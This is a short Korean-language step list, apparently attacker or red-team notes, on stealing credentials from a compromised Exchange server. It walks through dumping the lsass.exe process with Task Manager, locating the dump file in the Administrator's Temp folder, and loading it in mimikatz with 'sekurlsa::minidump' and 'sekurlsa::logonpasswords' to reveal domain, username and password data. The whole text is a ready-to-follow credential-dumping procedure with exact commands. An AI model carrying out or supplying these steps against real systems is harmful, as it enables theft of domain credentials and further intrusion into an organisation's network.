1. 공격자가 초기침투 성공한 Exchange Serverd에서 lsass.exe 덤프

Task Manager → Details → 오른쪽 마우스 클릭 → Create dump file

1. 덤프 완료 후 lsass.DMP 파일 저장 위치 확인

1. C:\Users\Administrator\AppData\Local\Temp\lsass.DMP 확인

1. mimikatz 관리자 권한으로 실행

1. sekurlsa::minidump C:\\Users\\Administrator\\AppData\\Local\\Temp\\lsass.DMP

명령어 minidump 뒤 DMP 파일 디렉터리로 지정

1. sekurlsa::logonpasswords 실행 시 Domain, Username, Password 등 확인 가능